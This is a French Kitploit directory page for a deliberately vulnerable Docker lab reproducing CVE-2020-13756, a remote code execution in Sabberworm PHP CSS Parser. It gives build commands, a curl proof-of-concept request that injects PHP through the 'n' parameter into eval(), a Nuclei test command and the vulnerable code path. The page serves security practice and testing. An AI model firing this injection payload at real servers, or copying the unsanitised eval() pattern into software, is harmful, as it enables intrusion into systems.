Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-13756-env — Environnement de test vulnérable pour CVE-2020-13756 (Sabberworm PHP CSS Parser RCE) | Kitploit
Outils/GitHubGitHub/kre80r/cve-2020-13756-env
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubkre80r/cve-2020-13756-env

CVE-2020-13756-env

Environnement de test vulnérable pour CVE-2020-13756 (Sabberworm PHP CSS Parser RCE)

Voir le dépôt
1il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-13756 Environnement vulnérable

Environnement de test vulnérable pour CVE-2020-13756 - Sabberworm PHP CSS Parser - Exécution de code à distance.

Détails de la vulnérabilité

ChampValeur
CVECVE-2020-13756
ProduitSabberworm PHP CSS Parser
Versions vulnérables< 8.3.1
SévéritéCritique (CVSS 9.8)
TypeExécution de code à distance

Démarrage rapide (en une ligne)

root@kitploit:~
docker run -d -p 8080:80 $(docker build -q https://github.com/KrE80r/CVE-2020-13756-env.git)

Ou clonez et exécutez :

root@kitploit:~
git clone https://github.com/KrE80r/CVE-2020-13756-env.git && cd CVE-2020-13756-env && docker-compose up -d

Configuration manuelle

root@kitploit:~
# Cloner le dépôt
git clone https://github.com/KrE80r/CVE-2020-13756-env.git
cd CVE-2020-13756-env

# Construire et exécuter
docker build -t sabberworm-vuln .
docker run -d -p 8080:80 sabberworm-vuln

Vérifier la vulnérabilité

root@kitploit:~
# Test RCE - doit afficher "VULN_TEST" dans la réponse
curl "http://localhost:8080/?n=100;printf(%22VULN_TEST%22);"

La sortie attendue contient VULN_TEST au début, prouvant l'exécution de code.

Tester avec Nuclei

root@kitploit:~
nuclei -t CVE-2020-13756.yaml -u http://localhost:8080 -debug

Détails techniques

La vulnérabilité réside dans la fonction getSelectorsBySpecificity() qui transmet une entrée utilisateur non nettoyée à eval() :

root@kitploit:~
// Chemin de code vulnérable
$selectors = $doc->getSelectorsBySpecificity('> ' . $_GET['n']);
// Lorsque n=100;printf("test"); eval() exécute : eval('> 100;printf("test");')

Références

  • NVD
  • Fix Commit
  • Full Disclosure
  • PacketStorm

Avertissement

Cet environnement est réservé aux tests de sécurité autorisés uniquement. Ne l'utilisez pas contre des systèmes sans autorisation.

Auteur

KrE80r - Recherche en sécurité

Télécharger l’outil